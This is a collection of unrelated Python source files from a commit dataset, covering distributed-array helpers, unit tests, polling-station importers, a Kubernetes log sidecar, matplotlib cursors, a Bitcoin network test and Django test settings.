# build up a python statement as a string
args_fmt = ','.join(['{}'] * len(arg_keys))
kwargs_fmt = ','.join(['{}={}'] * len(kwarg_keys))
fnargs_fmt = ','.join([args_fmt, kwargs_fmt])
statement_fmt = ''.join(['{} = {}(', fnargs_fmt, ')'])
replacement_values = ([result_key, func_key] + arg_keys +
flatten(zip(kwarg_names, kwarg_keys)))
statement = statement_fmt.format(*replacement_values)
# execute it locally and return the result as a DistArrayProxy
subcontext._execute(statement)
return DistArrayProxy(result_key, subcontext)
return inner
| """
ODIN: ODin Isn't Numpy
"""
from IPython.parallel import Client
from distarray.client import DistArrayContext, DistArrayProxy
from operator import add
# Set up a global DistArrayContext on import
_global_client = Client()
_global_view = _global_client[:]
_global_context = DistArrayContext(_global_view)
context = _global_context
def flatten(lst):
""" Given a list of lists, return a flattened list.
Only flattens one level. For example,
>>> flatten(zip(['a', 'b', 'c'], [1, 2, 3]))
['a', 1, 'b', 2, 'c', 3]
>>> flatten([[1, 2], [3, 4, 5], [[5], [6], [7]]])
[1, 2, 3, 4, 5, [5], [6], [7]]
"""
if len(lst) == 0:
return []
else:
return list(reduce(add, lst))
def key_and_push_args(context, arglist):
""" For each arg in arglist, get or generate a key (UUID).
For DistArrayProxy objects, just get the existing key. For
everything else, generate a key and push the value to the engines
Parameters
----------
context : DistArrayContext
arglist : List of objects to key and/or push
Returns
-------
arg_keys : list of keys
"""
arg_keys = []
for arg in arglist:
if isinstance(arg, DistArrayProxy):
# if a DistArrayProxy, use its existing key
arg_keys.append(arg.key)
is_self = (context == arg.context)
err_msg_fmt = "distarray context mismatch: {} {}"
assert is_self, err_msg_fmt.format(context, arg.context)
else:
# if not a DistArrayProxy, key it and push it to engines
arg_keys.extend(context._key_and_push(arg))
return arg_keys
def local(fn):
""" Decorator indicating a function is run locally on engines.
Parameters
----------
fn : function to wrap to run locally on engines
Returns
-------
fn : function wrapped to run locally on engines
"""
# we want @local functions to be able to call each other, so push
# their `__name__` as their key
func_key = fn.__name__
_global_context._push({func_key: fn})
result_key = _global_context._generate_key()
def inner(*args, **kwargs):
subcontext = kwargs.pop('context', None)
if subcontext is None:
subcontext = context
# generate keys for each parameter
# push to engines if not a DistArrayProxy
arg_keys = key_and_push_args(subcontext, args)
kwarg_names = kwargs.keys()
kwarg_keys = key_and_push_args(subcontext, kwargs.values())
# build up a python statement as a string
args_fmt = ','.join(['{}'] * len(arg_keys))
kwargs_fmt = ','.join(['{}={}'] * len(kwarg_keys))
fnargs_fmt = ','.join([args_fmt, kwargs_fmt])
statement_fmt = ''.join(['{} = {}(', fnargs_fmt, ')'])
replacement_values = ([result_key, func_key] + arg_keys +
flatten(zip(kwarg_names, kwarg_keys)))
statement = statement_fmt.format(*replacement_values)
# execute it locally and return the result as a DistArrayProxy
subcontext._execute(statement)
return DistArrayProxy(result_key, subcontext)
return inner
| Python | 0 |
df7235e13c14f13dd27ede6c098a9b5b80b4b297 | Add test_functions | neuralmonkey/tests/test_functions.py | neuralmonkey/tests/test_functions.py | #!/usr/bin/env python3
"""Unit tests for functions.py."""
# tests: mypy, lint
import unittest
import tensorflow as tf
from neuralmonkey.functions import piecewise_function
class TestPiecewiseFunction(unittest.TestCase):
def test_piecewise_constant(self):
x = tf.placeholder(dtype=tf.int32)
y = piecewise_function(x, [-0.5, 1.2, 3, 2], [-1, 2, 1000],
dtype=tf.float32)
with tf.Session() as sess:
self.assertAlmostEqual(sess.run(y, {x: -2}), -0.5)
self.assertAlmostEqual(sess.run(y, {x: -1}), 1.2)
self.assertAlmostEqual(sess.run(y, {x: 999}), 3)
self.assertAlmostEqual(sess.run(y, {x: 1000}), 2)
self.assertAlmostEqual(sess.run(y, {x: 1001}), 2)
if __name__ == "__main__":
unittest.main()
| Python | 0.000018 | |
b2acb7dfd7dc08afd64d80f25ab0a76469e5fff6 | add import script for North Lanarkshire | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 173/174 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000044'
council_name = 'North Lanarkshire'
elections = ['local.north-lanarkshire.2017-05-04']
def station_record_to_dict(self, record):
# clean up codes
record[1] = self.parse_string(record[1]).replace(' ', '').upper()
return super().station_record_to_dict(record)
def district_record_to_dict(self, record):
# clean up codes
record[0] = self.parse_string(record[0]).replace(' ', '').upper()
return super().district_record_to_dict(record)
| Python | 0 | |
cc907c9b8f22bd08ed6460e5e99ebb4e8ce5a499 | add import script for Perth and Kinross | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 104/107 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000024'
council_name = 'Perth and Kinross'
elections = ['local.perth-and-kinross.2017-05-04']
| Python | 0 | |
a9ed1a52a552d76246028d892cc6d01e5ac069cf | Move sidecar to api | api/events/monitors/sidecar.py | api/events/monitors/sidecar.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from django.conf import settings
from polyaxon_k8s.constants import PodLifeCycle
from polyaxon_k8s.manager import K8SManager
from api.config_settings import CeleryPublishTask
from api.celery_api import app as celery_app
from libs.redis_db import RedisToStream
from events.tasks import handle_events_job_logs
logger = logging.getLogger('polyaxon.monitors.sidecar')
def run(k8s_manager, pod_id, job_id):
raw = k8s_manager.k8s_api.read_namespaced_pod_log(pod_id,
k8s_manager.namespace,
container=job_id,
follow=True,
_preload_content=False)
for log_line in raw.stream():
experiment_id = 0 # TODO extract experiment id
logger.info("Publishing event: {}".format(log_line))
handle_events_job_logs.delay(experiment_id=experiment_id,
job_id=job_id,
log_line=log_line,
persist=settings.PERSIST_EVENTS)
if (RedisToStream.is_monitored_job_logs(job_id) or
RedisToStream.is_monitored_experiment_logs(experiment_id)):
celery_app.send_task(CeleryPublishTask.PUBLISH_LOGS_SIDECAR,
kwargs={'experiment_id': experiment_id,
'job_id': job_id,
'log_line': log_line})
def can_log(k8s_manager, pod_id):
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
logger.debug(status)
while status.status.phase != PodLifeCycle.RUNNING:
time.sleep(settings.LOG_SLEEP_INTERVAL)
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
def main():
pod_id = os.environ['POLYAXON_POD_ID']
job_id = os.environ['POLYAXON_JOB_ID']
k8s_manager = K8SManager(namespace=settings.NAMESPACE, in_cluster=True)
can_log(k8s_manager, pod_id)
run(k8s_manager, pod_id, job_id)
logger.debug('Finished logging')
if __name__ == '__main__':
main()
| Python | 0.000001 | |
6b81d938ed99a943e8e81816b9a013b488d4dfd8 | Add util.py to decode wordpiece ids in Transformer | fluid/neural_machine_translation/transformer/util.py | fluid/neural_machine_translation/transformer/util.py | import sys
import re
import six
import unicodedata
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
# Inverse of escaping.
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def tokens_to_ustr(tokens):
"""
Convert a list of tokens to a unicode string.
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def subtoken_ids_to_tokens(subtoken_ids, vocabs):
"""
Convert a list of subtoken(wordpiece) ids to a list of tokens.
"""
concatenated = "".join(
[vocabs.get(subtoken_id, u"") for subtoken_id in subtoken_ids])
split = concatenated.split("_")
ret = []
for t in split:
if t:
unescaped = unescape_token(t + "_")
if unescaped:
ret.append(unescaped)
return ret
def unescape_token(escaped_token):
"""
Inverse of encoding escaping.
"""
def match(m):
if m.group(1) is None:
return u"_" if m.group(0) == u"\\u" else u"\\"
try:
return six.unichr(int(m.group(1)))
except (ValueError, OverflowError) as _:
return u"\u3013" # Unicode for undefined character.
trimmed = escaped_token[:-1] if escaped_token.endswith(
"_") else escaped_token
return _UNESCAPE_REGEX.sub(match, trimmed)
def subword_ids_to_str(ids, vocabs):
"""
Convert a list of subtoken(word piece) ids to a native string.
Refer to SubwordTextEncoder in Tensor2Tensor.
"""
return tokens_to_ustr(subtoken_ids_to_tokens(ids, vocabs)).decode("utf-8")
| Python | 0.000002 | |
04e488fd1a0b08519aa806bfa598d7fc57452d76 | split scheddata from scheduler | pyworker/scheddata.py | pyworker/scheddata.py | import time
class scheddata(object):
"""
_srv = {
"srvname1": {
"begintime": 1460689440,
"interval": 1, # measured by minutes
"maxcount": 4,
"processing": {
nexttime1: [srvlist, occupied],
nexttime2: [srvlist, occupied],
nexttime3: [srvlist, occupied],
...
}
},
"srvname2": {
"begintime": 0,
"interval": 1, # measured by minutes
"maxcount": 4,
"processing": {
nexttime1: [srvlist, occupied],
nexttime2: [srvlist, occupied],
nexttime3: [srvlist, occupied],
...
}
},
...
}
if begintime is 0, interval is nonsense
if begintime is time, interval is used to calculate next begintime
maxcount limit elements number of processing
processing is list of data to process now
if processing number is less than maxcount, getdata will new new a nexttime if begintime is not 0
"""
def __init__(self):
self._srv = {}
def initdata(self, srvname, begintime=0, interval=1, maxcount=1):
if srvname in self._srv:
if begintime < 0 or interval <=0:
return ("add data " + srvname + ", begintime: " + str(begintime)
+ ", interval: " + str(interval) + ", maxcount: " + str(maxcount)
+ " failed!!")
else:
self._srv[srvname] = {}
if begintime == 0:
self._srv[srvname]["begintime"] = begintime
self._srv[srvname]["interval"] = 0
else:
interval *= 60
begintime = int(begintime) - int(begintime) % interval
self._srv[srvname]["begintime"] = begintime
self._srv[srvname]["interval"] = interval
self._srv[srvname]["maxcount"] = maxcount
self._srv[srvname]["processing"] = {}
return ("add data " + srvname + ", begintime: " + str(begintime)
+ ", interval: " + str(interval) + ", maxcount: " + str(maxcount)
+ " ok!!")
def _displaydata(self, srvname):
retstr = ""
if srvname in self._srv:
retstr += (srvname + ":\n")
retstr += ("\t" + "begintime: " + str(self._srv[srvname]["begintime"]) + "\n")
retstr += ("\t" + "interval: " + str(self._srv[srvname]["interval"]) + "\n")
retstr += ("\t" + "maxcount: " + str(self._srv[srvname]["maxcount"]) + "\n")
retstr += ("\t" + "processing:\n")
for k, v in self._srv[srvname]["processing"].iteritems():
retstr += ("\t\t" + str(k) + "\t" + str(v[0]) + "\t" + str(v[1]) + "\n")
return retstr
def displaydata(self, srvname=None):
retstr = ""
if not srvname:
for k in self._srv.iterkeys():
retstr += self._displaydata(k)
return retstr
else:
return self._displaydata(srvname)
def setdata(self, srvname, nexttime, srvlist):
if srvname not in self._srv:
self._srv[srvname] = {}
if nexttime not in self._srv[srvname]["processing"]:
self._srv[srvname]["processing"][nexttime] = []
self._srv[srvname]["processing"][nexttime].extend([srvlist, False])
else:
self._srv[srvname]["processing"][nexttime][0] = srvlist
self._srv[srvname]["processing"][nexttime][1] = False
def releasedata(self, srvname, nexttime):
if srvname in self._srv and nexttime in self._srv[srvname]["processing"]:
self._srv[srvname]["processing"][nexttime][1] = False
def getdata(self, srvname):
if srvname not in self._srv:
return None, None
if self._srv[srvname]["begintime"] != 0 and len(self._srv[srvname]["processing"]) < self._srv[srvname]["maxcount"]:
nexttime = self._srv[srvname]["begintime"]
interval = self._srv[srvname]["interval"]
begintime = nexttime + interval
begintime = int(begintime) - int(begintime) % interval
self._srv[srvname]["begintime"] = begintime
self._srv[srvname]["processing"][nexttime] = []
self._srv[srvname]["processing"][nexttime].extend([(nexttime,), False])
now = time.time()
for k, v in self._srv[srvname]["processing"].iteritems():
if k < now and not v[1]:
v[1] = True
return k, v[0]
return None, None
if __name__ == "__main__":
sd = scheddata()
sd.initdata("slp1", time.time()-600, 5, 4)
sd.initdata("slp2")
sd.initdata("slp3", maxcount=10)
print sd.displaydata()
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
nt, srvlist = sd.getdata("slp10")
print nt, srvlist
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
nt, srvlist = sd.getdata("slp1")
print nt, srvlist
print "release", nt
sd.releasedata("slp1", nt)
nt, srvlist = sd.getdata("slp1")
print nt, srvlist
nt, srvlist = sd.getdata("slp1")
print nt, srvlist
nt, srvlist = sd.getdata("slp1")
print nt, srvlist
print sd.displaydata("slp1")
nt, srvlist = sd.getdata("slp1")
print nt, srvlist
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sd.setdata("slp2", time.time()+5, ())
print sd.displaydata("slp2")
nt, srvlist = sd.getdata("slp2")
print nt, srvlist
time.sleep(10)
nt, srvlist = sd.getdata("slp2")
print nt, srvlist
| Python | 0.000002 | |
b8784640d67bbf27c3c2ecd5a684d04d49af1f00 | add datacursors module | datacursors.py | datacursors.py | # This module offers two Cursors:
# * DataCursor,
# where you have to click the data point, and
# * FollowDotCursor,
# where the bubble is always on the point
# nearest to your pointer.
#
# All the code was copied from
# http://stackoverflow.com/a/13306887
# DataCursor Example
# x=[1,2,3,4,5]
# y=[6,7,8,9,10]
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
# scat = ax.scatter(x, y)
# DataCursor(scat, x, y)
# plt.show()
# FollowDotCursor Example
# x=[1,2,3,4,5]
# y=[6,7,8,9,10]
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
# ax.scatter(x, y)
# cursor = FollowDotCursor(ax, x, y)
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
import scipy.spatial as spatial
import matplotlib.mlab as mlab
import matplotlib.cbook as cbook
def fmt(x, y):
return 'x: {x:0.2f}\ny: {y:0.2f}'.format(x=x, y=y)
# http://stackoverflow.com/a/4674445/190597
class DataCursor(object):
"""A simple data cursor widget that displays the x,y location of a
matplotlib artist when it is selected."""
def __init__(self, artists, x = [], y = [], tolerance = 5, offsets = (-20, 20),
formatter = fmt, display_all = False):
"""Create the data cursor and connect it to the relevant figure.
"artists" is the matplotlib artist or sequence of artists that will be
selected.
"tolerance" is the radius (in points) that the mouse click must be
within to select the artist.
"offsets" is a tuple of (x,y) offsets in points from the selected
point to the displayed annotation box
"formatter" is a callback function which takes 2 numeric arguments and
returns a string
"display_all" controls whether more than one annotation box will
be shown if there are multiple axes. Only one will be shown
per-axis, regardless.
"""
self._points = np.column_stack((x,y))
self.formatter = formatter
self.offsets = offsets
self.display_all = display_all
if not cbook.iterable(artists):
artists = [artists]
self.artists = artists
self.axes = tuple(set(art.axes for art in self.artists))
self.figures = tuple(set(ax.figure for ax in self.axes))
self.annotations = {}
for ax in self.axes:
self.annotations[ax] = self.annotate(ax)
for artist in self.artists:
artist.set_picker(tolerance)
for fig in self.figures:
fig.canvas.mpl_connect('pick_event', self)
def annotate(self, ax):
"""Draws and hides the annotation box for the given axis "ax"."""
annotation = ax.annotate(self.formatter, xy = (0, 0), ha = 'right',
xytext = self.offsets, textcoords = 'offset points', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0')
)
annotation.set_visible(False)
return annotation
def snap(self, x, y):
"""Return the value in self._points closest to (x, y).
"""
idx = np.nanargmin(((self._points - (x,y))**2).sum(axis = -1))
return self._points[idx]
def __call__(self, event):
"""Intended to be called through "mpl_connect"."""
# Rather than trying to interpolate, just display the clicked coords
# This will only be called if it's within "tolerance", anyway.
x, y = event.mouseevent.xdata, event.mouseevent.ydata
annotation = self.annotations[event.artist.axes]
if x is not None:
if not self.display_all:
# Hide any other annotation boxes...
for ann in self.annotations.values():
ann.set_visible(False)
# Update the annotation in the current axis..
x, y = self.snap(x, y)
annotation.xy = x, y
annotation.set_text(self.formatter(x, y))
annotation.set_visible(True)
event.canvas.draw()
class FollowDotCursor(object):
"""Display the x,y location of the nearest data point."""
def __init__(self, ax, x, y, tolerance=5, formatter=fmt, offsets=(-20, 20)):
try:
x = np.asarray(x, dtype='float')
except (TypeError, ValueError):
x = np.asarray(mdates.date2num(x), dtype='float')
y = np.asarray(y, dtype='float')
self._points = np.column_stack((x, y))
self.offsets = offsets
self.scale = x.ptp()
self.scale = y.ptp() / self.scale if self.scale else 1
self.tree = spatial.cKDTree(self.scaled(self._points))
self.formatter = formatter
self.tolerance = tolerance
self.ax = ax
self.fig = ax.figure
self.ax.xaxis.set_label_position('top')
self.dot = ax.scatter(
[x.min()], [y.min()], s=130, color='green', alpha=0.7)
self.annotation = self.setup_annotation()
plt.connect('motion_notify_event', self)
def scaled(self, points):
points = np.asarray(points)
return points * (self.scale, 1)
def __call__(self, event):
ax = self.ax
# event.inaxes is always the current axis. If you use twinx, ax could be
# a different axis.
if event.inaxes == ax:
x, y = event.xdata, event.ydata
elif event.inaxes is None:
return
else:
inv = ax.transData.inverted()
x, y = inv.transform([(event.x, event.y)]).ravel()
annotation = self.annotation
x, y = self.snap(x, y)
annotation.xy = x, y
annotation.set_text(self.formatter(x, y))
self.dot.set_offsets((x, y))
bbox = ax.viewLim
event.canvas.draw()
def setup_annotation(self):
"""Draw and hide the annotation box."""
annotation = self.ax.annotate(
'', xy=(0, 0), ha = 'right',
xytext = self.offsets, textcoords = 'offset points', va = 'bottom',
bbox = dict(
boxstyle='round,pad=0.5', fc='yellow', alpha=0.75),
arrowprops = dict(
arrowstyle='->', connectionstyle='arc3,rad=0'))
return annotation
def snap(self, x, y):
"""Return the value in self.tree closest to x, y."""
dist, idx = self.tree.query(self.scaled((x, y)), k=1, p=1)
try:
return self._points[idx]
except IndexError:
# IndexError: index out of bounds
return self._points[0]
| Python | 0.000001 | |
e69da5fb3550703c466cd8ec0e084e131fb97150 | add first small and simple tests about the transcoder manager | coherence/test/test_transcoder.py | coherence/test/test_transcoder.py |
from twisted.trial.unittest import TestCase
from coherence.transcoder import TranscoderManager
from coherence.transcoder import (PCMTranscoder, WAVTranscoder, MP3Transcoder,
MP4Transcoder, MP2TSTranscoder, ThumbTranscoder)
known_transcoders = [PCMTranscoder, WAVTranscoder, MP3Transcoder, MP4Transcoder,
MP2TSTranscoder, ThumbTranscoder]
# move this into the implementation to allow easier overwriting
def getuniquename(transcoder_class):
return getattr(transcoder_class, 'id')
class TranscoderTestMixin(object):
def setUp(self):
self.manager = TranscoderManager()
def tearDown(self):
# as it is a singleton ensuring that we always get a clean
# and fresh one is tricky and hacks the internals
TranscoderManager._instance = None
del self.manager
class TestTranscoderManagerSingletony(TranscoderTestMixin, TestCase):
def test_is_really_singleton(self):
#FIXME: singleton tests should be outsourced some when
old_id = id(self.manager)
new_manager = TranscoderManager()
self.assertEquals(old_id, id(new_manager))
class TestTranscoderAutoloading(TranscoderTestMixin, TestCase):
def setUp(self):
self.manager = None
def test_is_loading_all_known_transcoders(self):
self.manager = TranscoderManager()
for klass in known_transcoders:
self.assertEquals(self.manager.transcoders[getuniquename(klass)], klass)
| Python | 0 | |
d1958e834182fd7d43b97ea17057cc19dff21ca1 | Test addr response caching | test/functional/p2p_getaddr_caching.py | test/functional/p2p_getaddr_caching.py | #!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test addr response caching"""
import time
from test_framework.messages import (
CAddress,
NODE_NETWORK,
msg_addr,
msg_getaddr,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
MAX_ADDR_TO_SEND = 1000
def gen_addrs(n):
addrs = []
for i in range(n):
addr = CAddress()
addr.time = int(time.time())
addr.nServices = NODE_NETWORK
# Use first octets to occupy different AddrMan buckets
first_octet = i >> 8
second_octet = i % 256
addr.ip = "{}.{}.1.1".format(first_octet, second_octet)
addr.port = 8333
addrs.append(addr)
return addrs
class AddrReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.received_addrs = None
def get_received_addrs(self):
with p2p_lock:
return self.received_addrs
def on_addr(self, message):
self.received_addrs = []
for addr in message.addrs:
self.received_addrs.append(addr.ip)
def addr_received(self):
return self.received_addrs is not None
class AddrTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def run_test(self):
self.log.info('Create connection that sends and requests addr '
'messages')
addr_source = self.nodes[0].add_p2p_connection(P2PInterface())
msg_send_addrs = msg_addr()
self.log.info('Fill peer AddrMan with a lot of records')
# Since these addrs are sent from the same source, not all of them
# will be stored, because we allocate a limited number of AddrMan
# buckets per addr source.
total_addrs = 10000
addrs = gen_addrs(total_addrs)
for i in range(int(total_addrs / MAX_ADDR_TO_SEND)):
msg_send_addrs.addrs = addrs[i * MAX_ADDR_TO_SEND:
(i + 1) * MAX_ADDR_TO_SEND]
addr_source.send_and_ping(msg_send_addrs)
responses = []
self.log.info('Send many addr requests within short time to receive')
N = 5
cur_mock_time = int(time.time())
for i in range(N):
addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
addr_receiver.wait_until(addr_receiver.addr_received)
responses.append(addr_receiver.get_received_addrs())
for response in responses[1:]:
assert_equal(response, responses[0])
assert(len(response) < MAX_ADDR_TO_SEND)
cur_mock_time += 3 * 24 * 60 * 60
self.nodes[0].setmocktime(cur_mock_time)
self.log.info('After time passed, see a new response to addr request')
last_addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
last_addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
last_addr_receiver.wait_until(last_addr_receiver.addr_received)
# new response is different
assert(set(responses[0]) !=
set(last_addr_receiver.get_received_addrs()))
if __name__ == '__main__':
AddrTest().main()
| Python | 0.000201 | |
9698e473615233819f886c5c51220d3a213b5545 | Add initial prototype | script.py | script.py | #!/usr/bin/env python
import sys
import subprocess as subp
cmd = '' if len(sys.argv) <= 1 else str(sys.argv[1])
if cmd in ['prev', 'next']:
log = subp.check_output(['git', 'rev-list', '--all']).strip()
log = [line.strip() for line in log.split('\n')]
pos = subp.check_output(['git', 'rev-parse', 'HEAD']).strip()
idx = log.index(pos)
# Next commit:
if cmd == 'next':
if idx > 0:
subp.call(['git', 'checkout', log[idx - 1]])
else:
print("You're already on the latest commit.")
# Previous commit:
else:
if idx + 1 <= len(log) - 1:
subp.call(['git', 'checkout', 'HEAD^'])
else:
print("You're already on the first commit.")
else:
print('Usage: git walk prev|next')
| Python | 0.000002 | |
6500bc2682aeecb29c79a9ee9eff4e33439c2b49 | Add verifica_diff script | conjectura/teste/verifica_diff.py | conjectura/teste/verifica_diff.py | from sh import cp, rm, diff
import sh
import os
SURSA_VERIFICATA = 'conjectura-inturi.cpp'
cp('../' + SURSA_VERIFICATA, '.')
os.system('g++ ' + SURSA_VERIFICATA)
filename = 'grader_test'
for i in range(1, 11):
print 'Testul ', i
cp(filename + str(i) + '.in', 'conjectura.in')
os.system('./a.out')
print diff('conjectura.out', filename + str(i) + '.ok')
for extension in ['in', 'out']:
rm('conjectura.' + extension)
rm(SURSA_VERIFICATA)
rm('a.out')
| Python | 0.000001 | |
5d769d651947384e18e4e9c21a10f86762a3e950 | add more tests | test/test_api/test_api_announcement.py | test/test_api/test_api_announcement.py | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2017 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
import json
from default import db, with_context
from test_api import TestAPI
from factories import AnnouncementFactory
from factories import UserFactory, HelpingMaterialFactory, ProjectFactory
from pybossa.repositories import AnnouncementRepository
from mock import patch
announcement_repo = AnnouncementRepository(db)
class TestAnnouncementAPI(TestAPI):
@with_context
def test_query_announcement(self):
"""Test API query for announcement endpoint works"""
owner = UserFactory.create()
user = UserFactory.create()
# project = ProjectFactory(owner=owner)
announcements = AnnouncementFactory.create_batch(9)
announcement = AnnouncementFactory.create()
# As anon
url = '/announcements/'
res = self.app_get_json(url)
data = json.loads(res.data)
assert len(data['announcements']) == 10, data
| Python | 0 | |
18b22600f94be0e6fedd6bb202753736d61c85e6 | Add alternative settings to make test debugging easier | runserver_settings.py | runserver_settings.py | from django.conf import global_settings
import os
SITE_ID = 1
TIME_ZONE = 'Europe/Amsterdam'
PROJECT_ROOT = os.path.join(os.path.dirname(__file__))
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'media')
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'assets')
STATICI18N_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')
STATICFILES_DIRS = (
(os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')),
)
STATIC_URL = '/static/assets/'
MEDIA_URL = '/static/media/'
COMPRESS_ENABLED = False # = True: causes tests to be failing for some reason
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
# django-compressor staticfiles
'compressor.finders.CompressorFinder',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'test.db'),
# 'NAME': ':memory:',
}
}
SECRET_KEY = '$311#0^-72hr(uanah5)+bvl4)rzc*x1&b)6&fajqv_ae6v#zy'
INSTALLED_APPS = (
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
#3rp party apps
'compressor',
'registration',
'rest_framework',
'social_auth',
'south',
'taggit',
'templatetag_handlebars',
# Bluebottle apps
'bluebottle.accounts',
'bluebottle.common',
'bluebottle.geo',
)
MIDDLEWARE_CLASSES = [
# Have a middleware to make sure old cookies still work after we switch to domain-wide cookies.
'bluebottle.bluebottle_utils.middleware.SubDomainSessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# https://docs.djangoproject.com/en/1.4/ref/clickjacking/
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.transaction.TransactionMiddleware',
]
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'templates'),
)
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'apptemplates.Loader', # extend AND override templates
]
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
# Makes the 'request' variable (the current HttpRequest) available in templates.
'django.core.context_processors.request',
'django.core.context_processors.i18n'
)
AUTH_USER_MODEL = 'accounts.BlueBottleUser'
ROOT_URLCONF = 'bluebottle.urls'
SESSION_COOKIE_NAME = 'bb-session-id'
# Django-registration settings
ACCOUNT_ACTIVATION_DAYS = 4
HTML_ACTIVATION_EMAIL = True # Note this setting is from our forked version.
SOUTH_TESTS_MIGRATE = False # Make south shut up during tests
SELENIUM_TESTS = True
SELENIUM_WEBDRIVER = 'phantomjs' # Can be any of chrome, firefox, phantomjs
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEBUG = True
TEMPLATE_DEBUG = True
USE_EMBER_STYLE_ATTRS = True | Python | 0 | |
3a1f37ea0e46ea396c2ce407a938677e86dc6655 | Adding a test Hello World | hello_world.py | hello_world.py | print "Hello World !"
| Python | 0.999909 | |
a1f411be91a9db2193267de71eb52db2f334641b | add a file that prints hello lesley | hellolesley.py | hellolesley.py | #This is my hello world program to say hi to Lesley
print 'Hello Lesley'
| Python | 0.000258 | |
03b80665f6db39002e0887ddf56975f6d31cc767 | Create __init__.py | server/__init__.py | server/__init__.py | Python | 0.000429 | ||
33581b5a2f9ca321819abfd7df94eb5078ab3e7c | Add domain.Box bw compatibility shim w/deprecation warning | lepton/domain.py | lepton/domain.py | #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
